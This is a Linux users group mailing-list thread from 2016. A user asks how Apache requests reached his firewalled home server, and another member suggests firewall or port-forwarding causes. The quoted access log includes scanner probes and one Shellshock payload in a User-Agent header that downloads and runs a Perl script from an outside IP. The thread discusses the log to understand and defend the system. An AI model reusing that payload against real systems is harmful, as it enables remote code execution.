[lug] Apache requests (to webdav) behind firewall?!

[Lee Woodworth]

Is the firewall active and configured with the rules you are expecting?
How about a VPN or ssh port forwarding?

The log entries look like typical external connections.

On 11/14/2016 10:00 PM, Bear Giles wrote:
> ​I was looking for something else and was shocked to see there are requests
> in my Apache logs on my home system - behind a firewall that isn't supposed
> to be doing port forwarding!
> 
> ​164.132.201.51 - - [13/Nov/2016:08:47:56 -0700] "PROPFIND /webdav/
> HTTP/1.1" 405 569 "-" "WEBDAV Client"
> 212.92.127.143 - - [13/Nov/2016:09:10:45 -0700] "GET / HTTP/1.0" 200 3593
> "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
> 23.247.72.43 - - [13/Nov/2016:11:35:42 -0700] "GET / HTTP/1.1" 200 3574 "-"
> "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;
> .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC
> 6.0)"
> 164.132.201.51 - - [13/Nov/2016:12:39:32 -0700] "PROPFIND /webdav/
> HTTP/1.1" 405 569 "-" "WEBDAV Client"
> 212.92.127.29 - - [13/Nov/2016:14:21:52 -0700] "GET
> /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 479 "-" "() { :; }; /bin/bash -c
> \"wget -O /tmp/.nova.txt 93.158.203.136/style.css; curl -o /tmp/.nova.txt
> 93.158.203.136/style.css; perl /tmp/.nova.txt; rm -rf /tmp/.nova.txt\""
> 141.212.122.128 - - [13/Nov/2016:14:26:01 -0700] "GET /x HTTP/1.1" 400 0
> "-" "Telesphoreo"
> 192.99.144.140 - - [13/Nov/2016:14:54:49 -0700] "PROPFIND /webdav/
> HTTP/1.1" 405 569 "-" "WEBDAV Client"
> 
> ​There are obviously probes - but how did they get into the system? Via
> malicious javascript that's getting past my filters? Something else? The
> 'wget' entry is particularly disturbing since it clearly recognizes that
> I'm running Linux.​
> 
> 
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
> Join us on IRC: irc.hackingsociety.org port=6667 channel=#hackingsociety
>